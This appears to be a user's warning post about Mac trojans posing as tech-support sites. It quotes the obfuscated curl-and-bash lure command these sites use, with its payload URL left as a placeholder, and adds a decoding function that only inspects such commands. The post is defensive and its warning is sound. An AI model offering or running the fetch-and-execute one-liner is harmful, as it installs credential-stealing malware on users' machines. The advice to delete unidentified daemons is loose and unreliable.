Some current Trojans disguise themselves as Mac technical support or tutorial websites, often teaching you how to solve common problems in order to build trust. At the end, they give you a command to "copy and paste into Terminal."
Command:
/bin/bash -c "$(curl -fsSL $(echo [long_string] | base64 -d))"
When you run this and enter your administrator password, it steals your keychain passwords, memos, and cryptocurrency wallets, compresses them, and uploads them to the attacker's server. This is a targeted theft Trojan.
Thus, don't blindly copy commands from online sources.
Similarly, many cracked plugins for pirated Mac software may hide cracked commands, requiring you to double-click and enter your administrator password. I've had similar experiences before, and I'm unsure if my Mac is infected with viruses.
So, when running commands in Terminal, always check for malicious intent. If you can't see the command code, don't enter your administrator password.
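One way to do that check for a command shaped like the one above, as an added example that is not part of the original post: the shell function below decodes the base64-looking pieces of a pasted command and prints any URL they hide, without downloading or running anything. The function name and the example.invalid URL are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): show which URL a pasted
# one-liner hides behind base64, without downloading or running anything.

# decode_hidden_urls CMD
# Prints every http(s) URL found by decoding base64-looking tokens in CMD.
# The body runs in a subshell "( ... )" so its variables stay local.
decode_hidden_urls() (
    # Candidate tokens: 16+ base64 characters plus optional "=" padding.
    # "|| true" keeps the function usable under "set -e" when nothing matches.
    tokens=$(printf '%s\n' "$1" | grep -oE '[A-Za-z0-9+/]{16,}={0,2}' || true)
    for token in $tokens; do
        # Decode only; text that is not real base64 fails the URL check below.
        decoded=$(printf '%s' "$token" | base64 -d 2>/dev/null | LC_ALL=C tr -d '\000')
        case $decoded in
            http://*|https://*) printf '%s\n' "$decoded" ;;
        esac
    done
)

# Constructed sample: the shape of the command from the post, with a harmless
# placeholder URL encoded at run time in place of [long_string].
sample_b64=$(printf '%s' 'https://example.invalid/install.sh' | base64)
sample_cmd="/bin/bash -c \"\$(curl -fsSL \$(echo $sample_b64 | base64 -d))\""

echo "Pasted command: $sample_cmd"
echo "Would download and execute:"
decode_hidden_urls "$sample_cmd"
```

An empty result only means no base64-encoded URL was found in the text, not that the command is safe to run.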
If you're concerned about your computer, you can type
ls /Library/LaunchAgents
or
ls /Library/LaunchDaemons
in Terminal to check for any unidentified daemons. If there are any, back them up first, then delete these daemons, and restart your computer.
PS: Since there are many daemons, it's recommended to organize them into a document and send it to ChatGPT for review.
Reference article
Mac Support, Malware, and Tricks: Trojans are a Trojan Weapon: https://www.mactechnews.de/news/article/Mac-Support-Sucht-Malware-Support-Tricks-are-a-Trojan-weapon-187809.html